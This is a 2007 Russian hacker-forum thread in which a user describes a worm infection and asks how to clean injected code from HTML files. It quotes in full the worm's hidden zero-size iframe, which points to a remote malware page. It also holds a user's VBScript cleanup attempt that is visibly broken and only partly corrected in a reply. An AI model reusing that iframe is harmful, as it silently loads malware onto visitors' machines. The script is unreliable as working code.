20.08.2007, 22:17
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
С нами:
10077446
Репутация:
3965
|
|
Вирь Win32:Agent-ITS
Вот попалса такой червяк.
Поставил автозапуск себе [setup.exe] на все локальные диски....Заражает exe. Сидит в памяти..
Я убил процес..потом del ето вирь..но не ето главное.
А Ищо копируетс в %windir%/system32/drivers/spoclsv.exe
Блин..но он заражает все html
т.к все html у меня зараж.
Он дописует в конце
PHP код:
<iframe src="http://[COLOR=Red]ww[/COLOR].viph.net/wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe>
Что ето за ссылка?
И есть прога которая находила все *.htm\*.html и удаляла етот кусок?
----------------------
сенк всем заранее
__________________
BlackHat. MoDL
|
|
|
20.08.2007, 22:34
|
|
Участник форума
Регистрация: 24.06.2007
Сообщений: 259
С нами:
9937826
Репутация:
163
|
|
Если не ошибаюсь, это вирь с автозаливом, или что о в этом роде... Его можно на сайтах поцепить.. сталкивался с таким червем... Лечить его не охота, переустановлю винду.
|
|
|
|
20.08.2007, 23:04
|
|
Участник форума
Регистрация: 03.03.2007
Сообщений: 135
С нами:
10100071
Репутация:
124
|
|
2 Dimi4, проги скорее всего нету, можешь сам написать, найди исходник программы для поиска файлов, а вырезание строки сам допиши
|
|
|
|
20.08.2007, 23:12
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
С нами:
10077446
Репутация:
3965
|
|
Стясняюсь спросить:
На каком языке исходник искать а то я не очень-то кодер...
А может можна там VBs, Js через ActiveX?
__________________
BlackHat. MoDL
|
|
|
|
20.08.2007, 23:49
|
|
Постоянный
Регистрация: 27.08.2006
Сообщений: 367
С нами:
10370602
Репутация:
472
|
|
Если не ошибаюсь, это вирь с автозаливом, или что о в этом роде... Его можно на сайтах поцепить.. сталкивался с таким червем... Лечить его не охота, переустановлю винду.
Порадовало. Под автозаливом понимается автоматический слив денег со счета холдера на счет владельца трояна. Наверное ты имел ввиду автораспространение, зупачу к примеру.
|
|
|
|
21.08.2007, 02:26
|
|
Участник форума
Регистрация: 03.03.2007
Сообщений: 135
С нами:
10100071
Репутация:
124
|
|
2 Dimi4, написать можно на чем угодно, если надо на vbs то на сайте wilderwind.narod.ru есть пример вируса на vbs, который сносит все незанятые другими приложениями файлы на диске, его вобщем нетрудно переделать под поиск html файлов и их лечение
|
|
|
|
21.08.2007, 08:18
|
|
Fail
Регистрация: 17.09.2005
Сообщений: 2,242
С нами:
10866626
Репутация:
4268
|
|
Пройдщись хорошенько обновленным антивирусом (нод32 советую) в SafeMode.
AVZ - неплохо детектит "хитрые" вирусы. Вкупе с НОДом он попалит большинство поползновений виря.
Порченных HTML вряд ли у тебя так уж и много, так что обойдись руками, так быстрее будет.
Еще лучше - переустанови винду. Вирмейкеры люди хитрые, может ты только верхушку айсберга видешь=)
__________________
...
|
|
|
|
21.08.2007, 10:59
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
С нами:
10077446
Репутация:
3965
|
|
Порченных Html вряд ли у тебя так уж и много, так что обойдись руками, так быстрее будет.
Нет-уш...много у меня...
--------
нода нет..есть аваст.
Еще лучше - переустанови винду.
2дня назад переустанавлевал
__________________
BlackHat. MoDL
|
|
|
|
21.08.2007, 11:16
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
С нами:
10077446
Репутация:
3965
|
|
PHP код:
Set FSO = CreateObject("Scripting.FileSystemObject")
Set wshshell = createobject("WScript.Shell")
'
Set TheFolder = FSO.GetFolder("D:\")
TheExtension = ".html"
TheExtension = UCase(TheExtension)
'
Sub WorkWithSubFolders(ByVal AFolder, ByVal TheExtension)
On Error Resume Next
Dim MoreFolders, TempFolder
Set MoreFolders = AFolder.SubFolders
For Each TempFolder In MoreFolders
WorkWithSubFolders TempFolder, TheExtension
Next
End Sub
'
Dim AFile, TheFiles
On Error Resume Next
Set TheFiles = AFolder.Files
For Each AFile In TheFiles
If UCase(FSO.GetExtensionName(AFile.Path)) = TheExtension Then
'''
dim oReg
set oReg = New RegExp
oReg.Global - true
oReg.IgnoreCase = true
oReg.Pattern = " <iframe src="http://ww.viph.net/wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe> "
txt = oReg.Replace(txt, " ")
end if
Next
End Sub
'
WorkWithSubFolders TheFolder, TheExtension
Такой скрипт подойдет?
__________________
BlackHat. MoDL
|
|
|
|
27.08.2007, 21:20
|
|
Участник форума
Регистрация: 03.03.2007
Сообщений: 135
С нами:
10100071
Репутация:
124
|
|
работать точно не будет из-за этой строки
PHP код:
oReg.Pattern = " <iframe src="http://ww.viph.net/wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe> "
надо каждую кавычку заменить на две:
PHP код:
oReg.Pattern = " <iframe src=""http://ww.viph.net/wuhan/down.htm"" width=""0"" height=""0"" frameborder=""0""> </iframe> "
|
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
